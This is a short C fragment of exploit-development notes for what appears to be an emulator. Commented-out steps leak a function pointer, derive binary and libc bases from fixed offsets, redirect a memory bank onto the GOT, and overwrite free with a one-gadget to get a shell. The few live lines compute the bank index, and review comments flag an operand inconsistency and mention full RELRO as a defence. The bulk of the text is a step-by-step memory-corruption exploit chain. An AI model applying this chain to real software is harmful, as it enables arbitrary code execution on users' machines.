// Exploit-development scratch notes. The commented-out lines are the author's
// working record of a GOT-overwrite attempt; only the four uncommented
// statements are live code. Every name used here (op0x00_gb, processor_addr,
// wrambanks, free_got, free, target_index) is declared outside this fragment;
// they appear to be address-valued integers or pointers — confirm against the
// enclosing file, since the arithmetic below is only meaningful on such types.
// Defensive context: the live code turns two leaked addresses into a bank-table
// index so that a GOT slot becomes reachable through that table; a read-only
// GOT (full RELRO) removes the precondition the commented lines rely on.
// /* causes segfault (TESTED!) */
// // *op0x00_gb = 0;
// /* leak function pointer and base / got */
// op0x00 = *op0x00_gb;
// base = op0x00 - 0x1d420;
// free_got = base + 0x4ad78;
// /* use processor registers to read / write */
// processor + 0x2068
// /* reset wram bank to point to GOT */
// Bank-table base: a fixed offset from processor_addr (offset taken as-is from
// the author's notes; not verifiable from this fragment).
wrambanks = processor_addr + 0x126a0;
// Distance from the bank table to free_got in 0x1000-byte units. C division
// truncates toward zero, so a negative difference rounds up here.
target_index = (free_got - wrambanks) / 0x1000;
// NOTE(review): the remainder test reads `free` while the quotient above reads
// `free_got` — an inconsistency; confirm which operand is intended. Presumably
// the `-= 1` is meant to floor a negative quotient; for a positive difference
// with a non-zero remainder it lands one below the floor instead — verify.
if ((free - wrambanks) % 0x1000 != 0)
target_index -= 1;
// /* replace free with one gadget */
// free_gb = (void*)free_got - (wrambanks - target_index * 0x1000) + 0xD000;
// free = *(free_gb);
// libc = free - 0x9a6d0;
// onegadget = libc + 0xe3afe;
// *free_gb = onegadget;